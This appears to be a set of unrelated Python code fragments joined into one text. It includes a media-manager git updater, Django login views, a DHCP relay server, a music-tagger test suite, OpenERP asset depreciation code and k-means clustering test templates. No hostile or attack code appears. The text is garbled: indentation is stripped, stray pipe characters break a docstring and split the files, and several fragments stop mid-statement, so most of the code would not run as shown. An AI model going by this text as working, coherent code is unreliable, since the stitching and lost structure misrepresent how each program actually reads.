# alternative_gp += ["%USERPROFILE%\AppData\Local\GitHub\PORTAB~1\bin\git.exe", "C:\Program Files (x86)\Git\bin\git.exe"]
# Returns an empty string on failure
output = GitUpdater().git_exec(gp, 'version')
if output:
# Found a working git path.
self.logger.debug("Found git path %s" % gp)
htpc.settings.set('git_path', gp)
return True
if alternative_gp and not output:
self.logger.debug("Checking for alternate git location")
for current_gp in alternative_gp:
self.logger.debug("Testing git path %s" % current_gp)
output = GitUpdater().git_exec(current_gp, 'version')
if output:
self.logger.debug("Found git path %s and it works!" % current_gp)
self.logger.debug("Saving git path %s to settings" % current_gp)
htpc.settings.set('git_path', current_gp)
return True
return False
@cherrypy.expose()
@cherrypy.tools.json_out()
def index(self, force=False):
""" Update on POST. Check for new updates on GET. """
if cherrypy.request.method.upper() == 'POST':
    # Run check_update() first when an update is forced (this branch was
    # previously unreachable because it was tested after the plain POST
    # branch), then kick off the update in a background thread.
    if force:
        self.check_update()
    Thread(target=self.updateEngine.update).start()
    return 1
else:
    return self.check_update()
@cherrypy.expose()
@cherrypy.tools.json_out()
def updatenow(self):
Thread(target=self.updateEngine.update).start()
@cherrypy.expose()
@cherrypy.tools.json_out()
def status(self):
""" method to determine if HTPC Manager is currently updating """
return self.updateEngine.UPDATING
def check_update(self):
"""
Check for updates
Returns dict() with the following indexes:
UpdateNeeded True if an update is needed, False if an update is not needed OR not possible
latestVersion Commit hash of the most recent commit
currentVersion Commit hash for the version currently in use
versionsBehind How many versions is the current version behind the latest version
"""
output = {'updateNeeded': True, 'latestVersion': 'Unknown', 'currentVersion': 'Unknown', 'versionsBehind': 'Unknown'}
self.logger.info("Checking for updates from %s." % self.updateEngineName)
# Get current and latest version
# current can return True, False, Unknown, and SHA
current = self.updateEngine.current()
htpc.CURRENT_HASH = current
# Can return True, False
latest = self.updateEngine.latest()
htpc.LATEST_HASH = latest
self.logger.debug("Latest commit is %s" % latest)
self.logger.debug("Current commit is %s" % current)
if latest is False:
self.logger.error("Failed to determine the latest version for HTPC Manager.")
else:
output['latestVersion'] = latest
if current is False:
self.logger.error("Failed to determine the current version for HTPC Manager.")
else:
output['currentVersion'] = current
# If current or latest failed, updating is not possible
if current is False or latest is False:
self.logger.debug("Cancel update.")
output['updateNeeded'] = False
return output
# If HTPC Manager is up to date, updating is not needed
if current == latest and current != "Unknown":
self.logger.info("HTPC Manager is Up-To-Date.")
output['versionsBehind'] = 0
htpc.COMMITS_BEHIND = 0
output['updateNeeded'] = False
else:
behind = self.behind_by(current, latest)
htpc.COMMITS_BEHIND = behind
output['versionsBehind'] = behind
self.logger.info("Currently " + str(output['versionsBehind']) + " commits behind.")
return output
def behind_by(self, current, latest):
""" Check how many commits between current an | d latest """
self.logger.debug('Checking how far behind latest')
try:
url = 'https://api.github.com/repos/%s/%s/compare/%s...%s' % (gitUser, gitRepo, current, latest)
result = loads(urllib2.urlopen(url).read())
behind = int(result['total_commits'])
self.logger.debug('Behind: ' + str(behind))
return behind
except Exception, e:
self.logger.error(str(e))
self.logger.error('Could not determine how far behind')
return 'Unknown'
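# Uses GitHub's compare endpoint (GET /repos/:owner/:repo/compare/base...head);
# its "total_commits" field counts the commits current is behind latest.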
@cherrypy.expose()
@cherrypy.tools.json_out()
def branches(self):
return self.updateEngine.branches()
def update_needed(self):
self.logger.info("Running update_needed")
update_avail = self.check_update()
# returns true or false
if update_avail.get("updateNeeded"):
if htpc.settings.get('app_check_for_updates', False):
self.logger.debug("Add update footer")
# Used for the notification footer
htpc.UPDATE_AVAIL = True
else:
htpc.UPDATE_AVAIL = False
# Since im stupid, protect me please.. srsly its for myself.
if htpc.UPDATE_AVAIL and htpc.settings.get("app_auto_update", False) and not htpc.DEBUG:
self.logger.debug("Auto updating now!")
Thread(target=self.updateEngine.update).start()
class GitUpdater():
""" Class to update HTPC Manager using git commands. """
def __init__(self):
""" Set GitHub settings on load """
self.UPDATING = 0
self.git = htpc.settings.get('git_path', 'git')
self.logger = logging.getLogger('htpc.updater')
#self.update_remote_origin() # Disable this since it a fork for now.
def update_remote_origin(self):
self.git_exec(self.git, 'config remote.origin.url https://github.com/Hellowlol/HTPC-Manager.git')
def current_branch_name(self):
output = self.git_exec(self.git, 'rev-parse --abbrev-ref HEAD')
if output:
return output
else:
return htpc.settings.get('branch', 'master2')
def latest(self):
""" Get hash of latest commit on github """
self.logger.debug('Getting latest version from github.')
try:
url = 'https://api.github.com/repos/%s/%s/commits/%s' % (gitUser, gitRepo, self.current_branch_name())
result = loads(urllib2.urlopen(url).read())
latest = result['sha'].strip()
self.logger.debug('Branch: %s' % self.current_branch_name())
self.logger.debug('Latest sha: %s' % latest)
self.latestHash = latest
return latest
except Exception as e:
self.logger.error("Failed to get last commit from github")
return False
def current(self):
""" Get hash of current Git commit """
self.logger.debug('Getting current version.')
output = self.git_exec(self.git, 'rev-parse HEAD')
self.logger.debug('Current version: ' + output)
if not output:
self.logger.error("Couldn't determine the installed branch.")
return False
if re.match('^[a-z0-9]+$', output):
return output
def branches(self):
cbn = self.current_branch_name()
d = {
"branch": cbn,
"branches": []
}
if self.current() is not False:
d["verified"] = True
else:
# If it's False, default to the master branch
d["branch"] = htpc.settings.get('branch', 'master2')
branches = self.git_exec(self.git, 'ls-remote --heads https://github.com/Hellowlol/HTPC-Manager.git')
if branches:
# find all branches except the current branch.
d["branches"] = [b for b in re.findall('\S+ |
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.forms import AuthenticationForm
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.debug import sensitive_post_parameters
from django.views import generic
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
class LoginView(generic.FormView):
success_url = settings.LOGIN_REDIRECT_URL
form_class = AuthenticationForm
redirect_param = getattr(settings, 'REDIRECT_FIELD_NAME', 'next')
template_name = 'accounts/login.html'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
request.session.set_test_cookie()
return super(LoginView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
auth.login(self.request, form.get_user())
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return super(LoginView, self).form_valid(form)
def form_invalid(self, form):
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
redirect_to = self.request.GET.get(self.redirect_param)
if not is_safe_url(url=redirect_to, host=self.request.get_host()):
redirect_to = self.success_url
return redirect_to
class LogoutView(generic.RedirectView):
permanent = False
pattern_name = 'main:landing'
def get(self, request, *args, **kwargs):
auth.logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
class ProfileView(generic.TemplateView):
template_name = 'accounts/profile_detail.html'
|
packet was received.
"""
logging.info('received DHCPRELEASE from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
self._get_client_options(
'DHCP_RELEASE', self._get_packet_info(packet))
def _handleDHCPRequest(self, packet, source_address, port):
"""Processes a REQUEST packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('received DHCPREQUEST from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_REQUEST', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def get_next_dhcp_packet(self, timeout=60, packet_buffer=2048):
"""Make the _getNextDHCPPacket method public."""
return self._getNextDHCPPacket(timeout, packet_buffer)
def _send_dhcp_msg(
self, packet, msg_type, options, source_address, port
):
"""Send the DHCP packet to the client.
Set the options of the DHCP packet, and send it to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to send to the client.
msg_type (str):
The message type of the DHCP packet.
options (dict):
The options of the DHCP packet.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
if msg_type is None:
logging.warning('Ignore a packet: message type is None.')
return
for option, value in options.items():
packet.setOption(option, value)
# packet.setOption('server_identifier', self._server_address)
if msg_type == 'DHCP_OFFER':
packet.transformToDHCPOfferPacket()
elif msg_type == 'DHCP_ACK':
packet.transformToDHCPAckPacket()
elif msg_type == 'DHCP_NAK':
packet.transformToDHCPNakPacket()
else:
logging.warning('Incorrect message type: %s.', msg_type)
logging.warning('Packet will be ignored.')
return
logging.info('send %s to %s:%s',
msg_type, source_address.ip, port)
logging.debug('\n%s\n', packet)
self._sendDHCPPacket(packet, source_address, port)
@staticmethod
def _get_packet_info(packet):
"""Return a dict of the infomation of the DHCP packet.
Fetch the information from the DHCP packet, and return them
in dict type.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
Returns:
dict: The information of the packet.
"""
info = {}
# fetch the information from these fields
for field_name in [
'op', 'htype', 'hlen', 'hops', 'xid', 'secs', 'flags',
'ciaddr', 'yiaddr', 'siaddr', 'giaddr', 'chaddr',
'sname', 'file'
]:
info[field_name] = packet.getOption(field_name)
# fetch the information from the "option" field
options = {}
packet.setSelectedOptions()
for option in packet.getSelectedOptions():
options[option] = packet.getOption(option)
info['options'] = options
return info
def _get_client_optionsT(self, dhcp_type, client_info): #pylint: disable=I,W,C
'''Get the fixed options of the client.
This method is for debugging.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
res_msg_type (str): The message type that should send to client.
res_data (list): The options that should send to client (if needed).
'''
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
require_options = True
elif dhcp_type == 'DHCP_INFORM':
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# requireOptions = True
else:
logging.error('Incorrect dhcp_type from server: %s.', dhcp_type)
logging.error('Packet will be ignored.')
return [None, None]
res_msg_type = None
res_data = None
if require_options:
try:
res_msg_type = self._code_to_msg_type[dhcp_type][200]
except KeyError:
logging.error('Status code from server is not correct: ')
logging.error('Packet will be ignored.')
if res_msg_type is not None:
try:
res_data = {
'subnet_mask': '255.255.255.0',
'router': '192.168.1.1',
'domain_name_servers': '8.8.8.8',
'ip_address_lease_time': 3600,
'server_identifier': '127.0.0.1',
'yiaddr': '192.168.1.100'
}
except ValueError:
logging.error('Data sent from server is not correct.')
return [res_msg_type, res_data]
def _get_client_options(self, dhcp_type, client_info):
'''Get the options of the client from a RESTful server.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
res_msg_type (str): The message type that should send to client.
res_data (list): The options that should send to client (if needed).
'''
# Send the information of the packet received from the client
# to the AA server, and get the response.
res = None
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
logging.debug('Url: %s', self._aaserver_addr)
res = requests.post(self._aaserver_addr + '/discover',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
res = requests.post(self._aaserver_addr + '/request',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_INFORM':
res = requests.post(self._aaserver_addr + '/inform',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
res = requests.put(self._aaserver_addr + '/decline',
json=client_info)
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
res = requests.put(self._aaserver_addr + '/release',
json=client_info)
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# res = requests.post(self._aaserver_addr + '/leasequery',
# json=client_info)
# r |
def find_number(x):
str_x = str(x)
if len(str_x) == 1:
raise Exception()
left_most = str_x[0]
try:
small_from_rest = find_number(int(str_x[1:]))
return int(left_most + str(small_from_rest))
except:
# min() will throw an exception if its argument is an empty list, meaning no digit is greater than the left_most digit.
new_left_most = min([c for c in str_x[1:] if c > left_most])
# assumption: no repeated digit
rest_of_digits = ''.join(sorted([c for c in str_x if c != new_left_most]))
y = new_left_most + rest_of_digits
return int(y)
print(find_number(5346))
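# Prints 5364: the smallest number greater than 5346 using the same digits
# (assuming, as noted above, no repeated digit).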
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from mutagen.asf import ASFByteArrayAttribute
from test.picardtestcase import (
PicardTestCase,
create_fake_png,
)
from picard.formats import (
asf,
ext_to_format,
)
from .common import (
CommonTests,
load_metadata,
load_raw,
save_metadata,
save_raw,
skipUnlessTestfile,
)
from .coverart import CommonCoverArtTests
# prevent unittest from running the tests in these base classes
class CommonAsfTests:
class AsfTestCase(CommonTests.TagFormatsTestCase):
def test_supports_tag(self):
fmt = ext_to_format(self.testfile_ext[1:])
self.assertTrue(fmt.supports_tag('copyright'))
self.assertTrue(fmt.supports_tag('compilation'))
self.assertTrue(fmt.supports_tag('bpm'))
self.assertTrue(fmt.supports_tag('djmixer'))
self.assertTrue(fmt.supports_tag('discnumber'))
self.assertTrue(fmt.supports_tag('lyrics:lead'))
self.assertTrue(fmt.supports_tag('~length'))
for tag in self.replaygain_tags.keys():
self.assertTrue(fmt.supports_tag(tag))
@skipUnlessTestfile
def test_ci_tags_preserve_case(self):
# Ensure values are not duplicated on repeated save and are saved
# case preserving.
tags = {
'Replaygain_Album_Peak': '-6.48 dB'
}
save_raw(self.filename, tags)
loaded_metadata = load_metadata(self.filename)
loaded_metadata['replaygain_album_peak'] = '1.0'
save_metadata(self.filename, loaded_metadata)
raw_metadata = load_raw(self.filename)
self.assertIn('Replaygain_Album_Peak', raw_metadata)
self.assertEqual(raw_metadata['Replaygain_Album_Peak'][0], loaded_metadata['replaygain_album_peak'])
self.assertEqual(1, len(raw_metadata['Replaygain_Album_Peak']))
self.assertNotIn('REPLAYGAIN_ALBUM_PEAK', raw_metadata)
def _test_invalid_picture(self, invalid_picture_data):
png_data = create_fake_png(b'x')
tags = {
'WM/Picture': [
ASFByteArrayAttribute(invalid_picture_data),
ASFByteArrayAttribute(
asf.pack_image("image/png", png_data)
)
]
}
save_raw(self.filename, tags)
metadata = load_metadata(self.filename)
self.assertEqual(1, len(metadata.images))
self.assertEqual(png_data, metadata.images[0].data)
@skipUnlessTestfile
def test_ignore_invalid_wm_picture(self):
# A picture that cannot be unpacked
self._test_invalid_picture(b'notapicture')
class ASFTest(CommonAsfTests.AsfTestCase):
testfile = 'test.asf'
supports_ratings = True
expected_info = {
'length': 92,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
}
class WMATest(CommonAsfTests.AsfTestCase):
testfile = 'test.wma'
supports_ratings = True
expected_info = {
'length': 139,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '64.0',
}
unexpected_info = ['~video']
class WMVTest(CommonAsfTests.AsfTestCase):
testfile = 'test.wmv'
supports_ratings = True
expected_info = {
'length': 565,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
'~video': '1',
}
class AsfUtilTest(PicardTestCase):
test_cases = [
# Empty MIME, description and data
(('', b'', 2, ''), b'\x02\x00\x00\x00\x00\x00\x00\x00\x00'),
# MIME, description set, 1 byte data
(('M', b'x', 2, 'D'), b'\x02\x01\x00\x00\x00M\x00\x00\x00D\x00\x00\x00x'),
# Empty MIME and description, 3 byte data
(('', b'abc', 0, ''), b'\x00\x03\x00\x00\x00\x00\x00\x00\x00abc'),
]
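# Packed WM/Picture layout exercised above: 1-byte image type, 4-byte
# little-endian data length, MIME as UTF-16-LE + NUL, description as
# UTF-16-LE + NUL, then the raw image bytes.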
def test_pack_and_unpack_image(self):
mime = 'image/png'
image_data = create_fake_png(b'x')
image_type = 4
description = 'testing'
tag_data = asf.pack_image(mime, image_data, image_type, description)
expected_length = 5 + 2 * len(mime) + 2 + 2 * len(description) + 2 + len(image_data)
self.assertEqual(tag_data[0], image_type)
self.assertEqual(len(tag_data), expected_length)
self.assertEqual(image_data, tag_data[-len(image_data):])
unpacked = asf.unpack_image(tag_data)
self.assertEqual(mime, unpacked[0])
self.assertEqual(image_data, unpacked[1])
self.assertEqual(image_type, unpacked[2])
self.assertEqual(description, unpacked[3])
def test_pack_image(self):
for args, expected in self.test_cases:
self.assertEqual(expected, asf.pack_image(*args))
def test_unpack_image(self):
for expected, packed in self.test_cases:
self.assertEqual(expected, asf.unpack_image(packed))
def test_unpack_image_value_errors(self):
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'')
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'\x02\x01\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x00\x00\x00\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "desc: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "image data size mismatch",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00\x00\x00x')
class AsfCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.asf'
class WmaCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.wma'
|
old_depreciation_line_ids = depreciation_lin_obj.search(cr, uid, [('asset_id', '=', asset.id), ('move_id', '=', False)])
if old_depreciation_line_ids:
depreciation_lin_obj.unlink(cr, uid, old_depreciation_line_ids, context=context)
amount_to_depr = residual_amount = asset.value_residual
if asset.prorata:
depreciation_date = datetime.strptime(self._get_last_depreciation_date(cr, uid, [asset.id], context)[asset.id], '%Y-%m-%d')
else:
# depreciation_date = 1st January of purchase year
purchase_date = datetime.strptime(asset.purchase_date, '%Y-%m-%d')
#if we already have some previous validated entries, starting date isn't 1st January but last entry + method period
if (len(posted_depreciation_line_ids)>0):
last_depreciation_date = datetime.strptime(depreciation_lin_obj.browse(cr,uid,posted_depreciation_line_ids[0],context=context).depreciation_date, '%Y-%m-%d')
depreciation_date = (last_depreciation_date+relativedelta(months=+asset.method_period))
else:
depreciation_date = datetime(purchase_date.year, 1, 1)
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
total_days = (year % 4) and 365 or 366
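# Old-style and/or ternary: non-leap years (year % 4 != 0) give 365, else 366;
# the century rules (e.g. 1900, 2100) are ignored by this approximation.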
undone_dotation_number = self._compute_board_undone_dotation_nb(cr, uid, asset, depreciation_date, total_days, context=context)
for x in range(len(posted_depreciation_line_ids), undone_dotation_number):
i = x + 1
amount = self._compute_board_amount(cr, uid, asset, i, residual_amount, amount_to_depr, undone_dotation_number, posted_depreciation_line_ids, total_days, depreciation_date, context=context)
company_currency = asset.company_id.currency_id.id
current_currency = asset.currency_id.id
# compute amount into company currency
amount = currency_obj.compute(cr, uid, current_currency, company_currency, amount, context=context)
residual_amount -= amount
vals = {
'amount': amount,
'asset_id': asset.id,
'sequence': i,
'name': str(asset.id) +'/' + str(i),
'remaining_value': residual_amount,
'depreciated_value': (asset.purchase_value - asset.salvage_value) - (residual_amount + amount),
'depreciation_date': depreciation_date.strftime('%Y-%m-%d'),
}
depreciation_lin_obj.create(cr, uid, vals, context=context)
# Considering Depr. Period as months
depreciation_date = (datetime(year, month, day) + relativedelta(months=+asset.method_period))
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
return True
def validate(self, cr, uid, ids, context=None):
if context is None:
context = {}
return self.write(cr, uid, ids, {
'state':'open'
}, context)
def set_to_close(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'close'}, context=context)
def set_to_draft(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'draft'}, context=context)
def _amount_residual(self, cr, uid, ids, name, args, context=None):
cr.execute("""SELECT
l.asset_id as id, SUM(abs(l.debit-l.credit)) AS amount
FROM
account_move_line l
WHERE
l.asset_id IN %s GROUP BY l.asset_id """, (tuple(ids),))
res=dict(cr.fetchall())
for asset in self.browse(cr, uid, ids, context):
res[asset.id] = asset.purchase_value - res.get(asset.id, 0.0) - asset.salvage_value
for id in ids:
res.setdefault(id, 0.0)
return res
def onchange_company_id(self, cr, uid, ids, company_id=False, context=None):
val = {}
if company_id:
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
if company.currency_id.company_id and company.currency_id.company_id.id != company_id:
val['currency_id'] = False
else:
                val['currency_id'] = company.currency_id.id
return {'value': val}
def onchange_purchase_salvage_value(self, cr, uid, ids, purchase_value, salvage_value, context=None):
val = {}
for asset in self.browse(cr, uid, ids, context=context):
if purchase_value:
                val['value_residual'] = purchase_value - salvage_value
if salvage_value:
val['value_residual'] = purchase_value - salvage_value
return {'value': val}
_columns = {
'account_move_line_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}),
'name': fields.char('Asset Name', size=64, required=True, readonly=True, states={'draft':[('readonly',False)]}),
'code': fields.char('Reference', size=32, readonly=True, states={'draft':[('readonly',False)]}),
'purchase_value': fields.float('Gross Value', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'currency_id': fields.many2one('res.currency','Currency',required=True, readonly=True, states={'draft':[('readonly',False)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'note': fields.text('Note'),
'category_id': fields.many2one('account.asset.category', 'Asset Category', required=True, change_default=True, readonly=True, states={'draft':[('readonly',False)]}),
'parent_id': fields.many2one('account.asset.asset', 'Parent Asset', readonly=True, states={'draft':[('readonly',False)]}),
'child_ids': fields.one2many('account.asset.asset', 'parent_id', 'Children Assets'),
'purchase_date': fields.date('Purchase Date', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'state': fields.selection([('draft','Draft'),('open','Running'),('close','Close')], 'Status', required=True,
help="When an asset is created, the status is 'Draft'.\n" \
"If the asset is confirmed, the status goes in 'Running' and the depreciation lines can be posted in the accounting.\n" \
"You can manually close an asset when the depreciation is over. If the last line of depreciation is posted, the asset automatically goes in that status."),
'active': fields.boolean('Active'),
'partner_id': fields.many2one('res.partner', 'Partner', readonly=True, states={'draft':[('readonly',False)]}),
'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the amount of depreciation lines.\n"\
" * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \
" * Degressive: Calculated on basis of: Residual Value * Degressive Factor"),
'method_number': fields.integer('Number of Depreciations', readonly=True, states={'draft':[('readonly',False)]}, help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Number of Months in a Period', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="The amount of time between two depreciations, in months"),
'method_end': fields.date('Ending Date', readonly=True, states={'draft':[('readonly',False)]}),
'method_progress_factor': fields.float('Degressive Factor', readonly=True, states={'draft':[('readonly',False)]}),
        'value_residual': fields.function(_amount_residual, string='Residual Value'),
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaegraph.business_base import NodeSearch, DeleteNode
from classificacaodtm_app.commands import ListClassificacaodtmCommand, SaveClassificacaodtmCommand, UpdateClassificacaodtmCommand, \
ClassificacaodtmPublicForm, ClassificacaodtmDetailForm, ClassificacaodtmShortForm
def save_classificacaodtm_cmd(**classificacaodtm_properties):
"""
Command to save Classificacaodtm entity
:param classificacaodtm_properties: a dict of properties to save on model
    :return: a Command that saves Classificacaodtm, validating and localizing properties received as strings
"""
return SaveClassificacaodtmCommand(**classificacaodtm_properties)
def update_classificacaodtm_cmd(classificacaodtm_id, **classificacaodtm_properties):
"""
Command to update Classificacaodtm entity with id equals 'classificacaodtm_id'
:param classificacaodtm_properties: a dict of properties to update model
    :return: a Command that updates Classificacaodtm, validating and localizing properties received as strings
"""
    return UpdateClassificacaodtmCommand(classificacaodtm_id, **classificacaodtm_properties)
def list_classificacaodtms_cmd():
"""
Command to list Classificacaodtm entities ordered by their creation dates
    :return: a Command that proceeds with the db operations when executed
"""
return ListClassificacaodtmCommand()
def classificacaodtm_detail_form(**kwargs):
"""
Function to get Classificacaodtm's detail form.
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmDetailForm(**kwargs)
def classificacaodtm_short_form(**kwargs):
"""
    Function to get Classificacaodtm's short form: just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmShortForm(**kwargs)
def classificacaodtm_public_form(**kwargs):
"""
    Function to get Classificacaodtm's public form: just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmPublicForm(**kwargs)
def get_classificacaodtm_cmd(classificacaodtm_id):
"""
    Find classificacaodtm by its id
:param classificacaodtm_id: the classificacaodtm id
:return: Command
"""
return NodeSearch(classificacaodtm_id)
def delete_classificacaodtm_cmd(classificacaodtm_id):
"""
Construct a command to delete a Classificacaodtm
:param classificacaodtm_id: classificacaodtm's id
:return: Command
"""
return DeleteNode(classificacaodtm_id)
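# Illustrative usage (not part of the original module; names are hypothetical):
# gaegraph commands are constructed first and executed later, e.g.
#
#     cmd = save_classificacaodtm_cmd(name='example')
#     cmd.execute()            # runs validation and datastore operations
#     saved_node = cmd.result  # assuming the gaegraph Command convention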
|
"""!
@brief Test templates for K-Means clustering module.
@authors Andrei Novikov (pyclustering@yandex.ru)
@date 2014-2020
@copyright BSD-3-Clause
"""
from pyclustering.tests.assertion import assertion
from pyclustering.cluster.encoder import type_encoding, cluster_encoder
from pyclustering.cluster.kmeans import kmeans, kmeans_observer, kmeans_visualizer
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric
from random import random
import numpy
class KmeansTestTemplates:
@staticmethod
def templateLengthProcessData(data, start_centers, expected_cluster_length, ccore, **kwargs):
if isinstance(data, str):
sample = read_sample(data)
else:
sample = data
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, start_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
wce = kmeans_instance.get_total_wce()
if itermax == 0:
assertion.eq(start_centers, centers)
assertion.eq([], clusters)
assertion.eq(0.0, wce)
return
expected_wce = 0.0
for index_cluster in range(len(clusters)):
for index_point in clusters[index_cluster]:
expected_wce += metric(sample[index_point], centers[index_cluster])
assertion.eq(expected_wce, wce)
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
assertion.eq(len(sample), sum(obtained_cluster_sizes))
assertion.eq(len(clusters), len(centers))
        for center in centers:
assertion.eq(len(sample[0]), len(center))
if expected_cluster_length is not None:
obtained_cluster_sizes.sort()
expected_cluster_length.sort()
assertion.eq(obtained_cluster_sizes, expected_cluster_length)
@staticmethod
def templatePredict(path_to_file, initial_centers, points, expected_closest_clusters, ccore, **kwargs):
        sample = read_sample(path_to_file)
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, initial_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
closest_clusters = kmeans_instance.predict(points)
assertion.eq(len(expected_closest_clusters), len(closest_clusters))
assertion.true(numpy.array_equal(numpy.array(expected_closest_clusters), closest_clusters))
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for _ in range(10) ] + [ [random() + 3] for _ in range(10) ] + [ [random() + 5] for _ in range(10) ] + [ [random() + 8] for _ in range(10) ]
kmeans_instance = kmeans(input_data, [ [0.0], [3.0], [5.0], [8.0] ], 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
assertion.eq(4, len(clusters))
for cluster in clusters:
assertion.eq(10, len(cluster))
@staticmethod
def templateEncoderProcedures(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
encoding = kmeans_instance.get_cluster_encoding()
encoder = cluster_encoder(encoding, clusters, sample)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LABELING)
encoder.set_encoding(type_encoding.CLUSTER_OBJECT_LIST_SEPARATION)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LIST_SEPARATION)
assertion.eq(number_clusters, len(clusters))
@staticmethod
def templateCollectEvolution(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
assertion.le(1, len(observer))
for i in range(len(observer)):
assertion.le(1, len(observer.get_centers(i)))
for center in observer.get_centers(i):
assertion.eq(len(sample[0]), len(center))
assertion.le(1, len(observer.get_clusters(i)))
@staticmethod
def templateShowClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
